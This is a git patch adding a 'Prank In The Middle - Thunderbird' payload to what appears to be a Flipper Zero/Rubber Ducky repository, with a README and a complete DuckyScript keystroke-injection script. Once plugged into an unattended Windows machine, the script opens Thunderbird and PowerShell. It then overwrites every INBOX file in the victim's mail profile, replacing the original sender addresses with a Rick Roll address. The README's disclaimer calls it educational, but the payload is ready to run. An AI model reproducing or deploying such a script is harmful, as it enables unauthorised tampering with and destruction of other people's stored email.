From 272beea6d98ef90b15a45d2a1a26071a43d7bf62 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 11:59:02 +0200 Subject: [PATCH] Prank In The Middle - Thunderbird The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. --- README.md | 10 +- .../Prank_In_The_Middle_Thunderbird/README.md | 95 +++++++++++++++ .../payload.txt | 113 ++++++++++++++++++ Windows/README.md | 1 + 4 files changed, 215 insertions(+), 4 deletions(-) create mode 100644 Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md create mode 100644 Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt diff --git a/README.md b/README.md index 0c46d17..4239184 100644 --- a/README.md +++ b/README.md @@ -31,12 +31,13 @@ |Type|Count| |--|--| -|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|29| -|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|44| +|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|30| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|45| |![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|4| |![macOS](https://img.shields.io/badge/mac%20os-000000?style=for-the-badge&logo=macos&logoColor=F0F0F0)|0 [Buy me a Mac](https://github.com/sponsors/aleff-github?frequency=one-time&sponsor=aleff-github) :-)| -|**Tot**|77| -|Hak5|41| +|**Tot**|79| +|Hak5 Payload accepted|111| +|Hak5 Payload Awarded|2| ## Payloads @@ -117,6 +118,7 @@ |![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Delete A Reminder With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Delete_A_Reminder_With_An_iPhone)|🟑| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Kali Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI)|🟒| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX)|🟒| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Prank In The Middle - Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Prank_In_The_Middle_Thunderbird)|🟒| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE)|πŸ”΄| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|πŸ”΄| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|πŸ”΄| diff --git a/Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md b/Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md new file mode 100644 index 0000000..a569d26 --- /dev/null +++ b/Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md @@ -0,0 +1,95 @@ +# Prank In The Middle - Thunderbird + +The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. + +**Category**: Prank + +**Plug-And-Play** ^^ + +## Index + +- [Description](#description) +- [Requirements](#requirements) +- [How the Program Works](#how-the-program-works) +- [Code Details](#code-details) + - [System Detection && Short Start DELAY](#system-detection--short-start-delay) + - [Navigating in Thunderbird](#navigating-in-thunderbird) + - [Opening PowerShell and Email Manipulation](#opening-powershell-and-email-manipulation) + - [The Regex](#the-regex) +- [Notes](#notes) +- [Credits](#credits) + +## Description + +This program automates a series of actions on a Windows system (*tested on Windows 10 but should works in Windows 11*) to manipulate the contents of emails found in a Thunderbird profile. Specifically, it identifies emails in the `INBOX` file of each configured email account and replaces the sender's email addresses with a fictitious address `Rick.Roll@tinyurl.com/prinkrollme` where `prinkrollme` is the union of the words `Prank`, `Rick Roll` and `Me` (*this one was necessary becouse prinkwoll era giΓ  stato preso* **:c** *so sad...* ) all compressed into the link `tinyurl.com/prinkrollme` ([*3Β° note*](#notes)) that redirect to the YouTube video `https://www.youtube.com/watch?v=xMHJGd3wwZk`. + +![](https://i.ibb.co/VJjfbkJ/1.png) + +## Requirements + +- A Windows system with Thunderbird installed. +- Access to PowerShell. +- Permissions to run code in Powershell + +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## How the Program Works + +1. **System Detection:** The program detects if the system reflects the CAPSLOCK state and sets a dynamic delay based on this. +2. **Opening Thunderbird:** Uses a series of commands to open Thunderbird and navigate to the profile folder settings. +3. **Copying the Profile Folder Path:** Copies the profile folder path to the clipboard. +4. **Opening PowerShell:** Opens a PowerShell window and navigates to the `ImapMail` folder of the Thunderbird profile. +5. **Email Manipulation:** Uses PowerShell to: + - Find all `INBOX` folders within `ImapMail`. + - Read the contents of the emails in `INBOX`. + - Replace the sender addresses with `Rick Roll `. + - Save the modified content back to the original email files. + +## Code Details + +For reasons of space, the code is not given in the documentation. However, comments can be found that broadly explain the piece of code that is executed following the comment itself. + +### The Regex + +The regex was not created from scratch but was taken from the discussion β€œ[How can I validate an email address using a regular expression?](https://stackoverflow.com/questions/201323/how-can-i-validate-an-email-address-using-a-regular-expression)” posted on **StackOverflow**. + +```plaintext +(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\]) +``` + +The only difference is the addition of `**From: <...>**` which reduces to just the email addresses that sent the emails and not all addresses detected in the file that might depict other references + +```plaintext +From:\s.*\s<...> +``` + +## Notes + +1) This program was created for educational and demonstrative purposes. Unauthorized alteration of emails is illegal, and violating others' privacy is a crime. +2) Ensure you have the necessary permissions before running any script that modifies personal or sensitive data. +3) Considering [Staged Payloads](https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads), generally, it is not possible to include code that downloads from external sources. In this case, however, the setup involves a redirect to a YouTube video, which has been conveniently shortened using `tiny.url`. It is important to note that this redirect can be modified, and I strongly recommend changing it to a personal link for your security. While I assure you that I will never alter the link, no one can guarantee that I won't be compromised, allowing someone else to alter the redirect. It is always advisable and a good practice to never use links found online without understanding the actual redirect and replacing it with your own link. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt b/Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt new file mode 100644 index 0000000..1971303 --- /dev/null +++ b/Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -0,0 +1,113 @@ +REM ##################################################### +REM # # +REM # Title : Prank In The Middle - Thunderbird # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : Prank # +REM # Target : Windows 10/11 # +REM # # +REM ##################################################### + +REM Open Thunderbird and goto settings +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +ENTER +DELAY 500 +REPEAT 2 UPARROW +ENTER +DELAY 500 +REPEAT 3 UPARROW +ENTER +DELAY 500 + +REM Goto profile directory +REPEAT 11 TAB +ENTER +DELAY 500 + +REM Copy the directory path +REPEAT 4 TAB +DELAY 500 +SPACEBAR +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 500 +ALT F4 +DELAY 500 + +REM Open the powershell and goto the directory +WIN r +STRING powershell +ENTER +DELAY 1500 +STRING cd +DELAY 500 +CTRL v +DELAY 500 +ENTER +DELAY 500 + +REM Get the INBOX content and edit it overwriting. Then close the powershell +STRING cd ImapMail +ENTER +DELAY 500 +STRING $directories = Get-ChildItem -Directory | Select-Object FullName +ENTER +DELAY 500 +STRING foreach ($dir in $directories) { +ENTER +DELAY 500 +STRING # Replace backslashes with slash +ENTER +DELAY 500 +STRING $newPath = $dir.FullName -replace '\\', '/' +ENTER +DELAY 500 +STRING # Add the sub-string β€œ/INBOX” to the end +ENTER +DELAY 500 +STRING $newPath += "/INBOX" +ENTER +DELAY 500 +STRING # Check whether the INBOX file exists +ENTER +DELAY 500 +STRING if (Test-Path $newPath) { +ENTER +DELAY 500 +STRING # Check whether the INBOX file exists +ENTER +DELAY 500 +STRING $emails = Get-Content -Path $newPath -Raw +ENTER +DELAY 500 +STRING # Replace email sender with Rick Roll! +ENTER +DELAY 500 +STRING # The following operation is simplified and assumes that the sender starts with β€œFrom: ...” +ENTER +DELAY 500 +STRING # and does not contain complex MIME structures +ENTER +DELAY 500 +STRING $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " +ENTER +DELAY 500 +STRING # Write the modified content into the INBOX file. +ENTER +DELAY 500 +STRING Set-Content -Path $newPath -Value $modifiedEmails -Force +ENTER +DELAY 500 +STRING } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 1000 +ALT F4 \ No newline at end of file diff --git a/Windows/README.md b/Windows/README.md index 60627ac..51250fd 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -73,6 +73,7 @@ |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Pranh(ex)](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Pranh(ex))|🟒| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendEmailThroughThunderbird)|🟒| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Change Github Profile Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Change_Github_Profile_Settings)|🟑| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Prank In The Middle - Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Prank_In_The_Middle_Thunderbird)|🟒| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Incident Response|[Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability)|🟒| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|πŸ”΄| |//|Prank|[Flipper Zero GIF](img/gif)|🟒|